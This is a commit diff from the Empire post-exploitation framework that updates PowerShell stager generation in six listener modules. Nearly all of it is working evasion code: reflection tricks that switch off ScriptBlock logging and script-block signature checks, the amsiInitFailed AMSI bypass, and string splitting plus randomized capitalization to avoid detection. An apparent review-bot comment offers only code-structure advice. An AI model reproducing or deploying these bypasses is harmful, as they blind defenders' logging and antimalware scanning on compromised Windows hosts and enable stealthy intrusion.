Merge pull request #740 from cobbr/empire-dev

Improved ScriptBlock logging bypasses
websockets-multiuser
Steve Borosh 2017-10-07 16:51:26 -04:00 committed by GitHub
commit 408782a265
6 changed files with 84 additions and 36 deletions


@ -175,15 +175,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -191,6 +198,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
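Review bot: The `# ScriptBlock Logging bypass` comment no longer describes the block it heads: the new line before it opens an `If($PSVersionTable.PSVersion.Major -ge 3){` wrapper, the block itself now emits an `If($GPS ...)`/`Else{ ... }` pair, and the wrapper's closing `}` is only appended in the second hunk after the AMSI section, so nothing in the comments tells a reader which lines the wrapper encloses. A comment on the wrapper line, e.g. `# PSv3+ guard; closed by the "}" appended after the AMSI bypass below`, and one on the `Else{` line marking it as the alternate branch would make the structure readable. The identical prelude is pasted into the five other listener sections of this commit, so any later correction has to be repeated six times; extracting it into one shared helper would keep the listeners in sync. The enclosing method starts before this hunk.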


@ -192,15 +192,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -208,6 +215,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")


@ -172,15 +172,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -188,6 +195,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?


@ -147,15 +147,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -163,6 +170,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")


@ -126,15 +126,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -142,6 +149,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")


@ -175,15 +175,23 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
stager += "}"
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";') stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')